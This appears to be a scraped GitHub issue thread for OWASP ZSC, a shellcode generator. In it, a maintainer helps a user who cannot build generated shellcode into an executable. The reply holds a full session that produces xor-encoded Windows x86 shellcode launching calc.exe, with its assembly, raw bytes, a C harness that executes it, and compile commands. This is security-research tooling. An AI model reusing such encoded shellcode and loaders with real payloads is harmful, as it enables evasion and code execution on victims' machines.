Comments (4)
Hi,
can you please share the file or the command you used for generating the shellcode?
Regards.
from zsc.
attached is the generated file
from zsc.
Been waiting for your response, can't this be reproduced into .exe?
from zsc.
Hi, sorry for my late answer, you encoded the file wrong! it has eval(some value) at the end which is not related to .c file or shellcodes.
- here is a sample command
______ __ _____ _____ ______ _____ _____
/ __ \ \ / /\ / ____| __ \ |___ // ____|/ ____|
| | | \ \ /\ / / \ | (___ | |__) | / /| (___ | |
| | | |\ \/ \/ / /\ \ \___ \| ___/ / / \___ \| |
| |__| | \ /\ / ____ \ ____) | | / /__ ____) | |____
\____/ \/ \/_/ \_\_____/|_| /_____|_____/ \_____|
OWASP ZeroDay Cyber Research Shellcoder
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate>
linux_x86 osx_x86 windows_x86 windows_x86_64
zsc/shellcode/generate> w
windows_x86 windows_x86_64
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> exec
zsc/shellcode/generate/windows_x86/exec> file_to_execute
file_to_execute> test/calc.exe
[+] file_to_execute set to "test/calc.exe"
[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue
[+] inc
[+] dec
[+] inc_timesyouwant
[+] dec_timesyouwant
[+] add_yourvalue
[+] sub_yourvalue
[+] enter encode type
zsc/shellcode/generate/windows_x86/exec/encode_type> xo
xor_random xor_yourvalue
zsc/shellcode/generate/windows_x86/exec/encode_type> xor_random
Output assembly code?(y or n)> y
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
push %ebx
push %edx
xor %ecx,%ecx
push %ecx
mov $0x61636578,%ecx
push %ecx
subl $0x61,0x3(%esp)
push %ebx
push $0x684b6641
pop %ebx
push $0x2d250f16
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %esp
push %ebx
call *%edx
add $0x8,%esp
pop %ecx
push %eax
xor %ecx,%ecx
push %ecx
push %ebx
push $0x346c7a53
pop %ebx
push $0x51fceac3
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
pop %ecx
shr $0x10,%ecx
shr $0x8,%ecx
push %ecx
push %ebx
push $0x64454f35
pop %ebx
push $0x1c206156
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %ebx
push $0x71366243
pop %ebx
push $0x1d57016c
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %ebx
push $0x634c6159
pop %ebx
push $0x173f042d
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
xor %ebx,%ebx
mov %esp,%ebx
xor %ecx,%ecx
inc %ecx
push %ecx
push %ebx
call *%eax
add $0x18,%esp
pop %edx
pop %ebx
xor %ecx,%ecx
mov $0x61737365,%ecx
push %ecx
subl $0x61,0x3(%esp)
push %ebx
push $0x4e525274
pop %ebx
push $0x2d3d2024
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %ebx
push $0x42687743
pop %ebx
push $0x36010f06
pop %ecx
xor %ebx,%ecx
pop %ebx
push %ecx
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
push %ecx
call *%eax
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0
Shellcode output to a .c file?(y or n)> y
Target .c file?> shellcode.c
[+] File saved as shellcode.c .
zsc> wrong input!
[!] interrupted by user!
Exit
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>type shellcode.c
#include <stdio.h>
#include <string.h>
/*
This shellcode generated by OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
http://zsc.z3r0d4y.com/
owasp-zsc[at]googlegroups[dot]com
Title: exec('test/calc.exe')
OS: windows_x86
Encode: xor_random
Length: 278
Assembly code:
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
push %ebx
push %edx
xor %ecx,%ecx
push %ecx
mov $0x61636578,%ecx
push %ecx
subl $0x61,0x3(%esp)
push $0x456e6957
push %esp
push %ebx
call *%edx
add $0x8,%esp
pop %ecx
push %eax
xor %ecx,%ecx
push %ecx
push $0x65909090
pop %ecx
shr $0x10,%ecx
shr $0x8,%ecx
push %ecx
push $0x78652e63
push $0x6c61632f
push $0x74736574
xor %ebx,%ebx
mov %esp,%ebx
xor %ecx,%ecx
inc %ecx
push %ecx
push %ebx
call *%eax
add $0x18,%esp
pop %edx
pop %ebx
xor %ecx,%ecx
mov $0x61737365,%ecx
push %ecx
subl $0x61,0x3(%esp)
push $0x636f7250
push $0x74697845
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
push %ecx
call *%eax
compile example(osx_x86): gcc -m32 -o shellcode_compiled shellcode.c
compile example(linux_x86): gcc -m32 -z execstack -o shellcode_compiled shellcode.c
compile example(windows_x86): gcc -o shellcode_compiled.exe shellcode.c
followed by(to run): ./shellcode_compiled or shellcode_compiled.exe
*/
char *shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x49\x31\x7a\x57\x5b\x68\x1e\x58\x14\x12\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x46\x49\x77\x49\x5b\x68\xd6\xd9\xe7\x2c\x59\x31\xd9\x5b\x51\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x53\x68\x57\x6b\x43\x6f\x5b\x68\x34\x45\x26\x17\x59\x31\xd9\x5b\x51\x53\x68\x35\x6c\x37\x51\x5b\x68\x1a\x0f\x56\x3d\x59\x31\xd9\x5b\x51\x53\x68\x79\x4c\x6b\x53\x5b\x68\x0d\x29\x18\x27\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x18\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x76\x73\x56\x43\x5b\x68\x26\x01\x39\x20\x59\x31\xd9\x5b\x51\x53\x68\x48\x41\x37\x50\x5b\x68\x0d\x39\x5e\x24\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0";
int main(void)
{
(*(void(*)()) shellcode)();
return 0;
}
C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>
did you use jsfuck encoding or something by accident? it's not gonna work for "c" language. (check the file you attached at line 113)
from zsc.
Related Issues (20)
- obfuscate: no validation on file type HOT 1
- --show-payloads turns my terminal green HOT 7
- No tab completion when calling ZSC from different directory HOT 3
- shell-storm download mangles quotes HOT 2
- shell-storm search changes contexts HOT 1
- Confusing addition to `help` command HOT 3
- Implement continuous integration with travis HOT 1
- After one has choosen obfuscate and then the language there is no way to go back to change language HOT 1
- OWASP Code Sprint 2017 HOT 1
- issue in php encoders HOT 1
- Update fails HOT 12
- It is impossible to exit/quit/back in shellcode download menu. HOT 1
- Obfuscate other sources code? HOT 1
- can close
- how to obfuscate with this? HOT 1
- ZSC made nothing HOT 5
- output shellcode file not showing the shellcode after obfuscate method
- Proof of code obfuscation functionality HOT 8
- Can not update
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from zsc.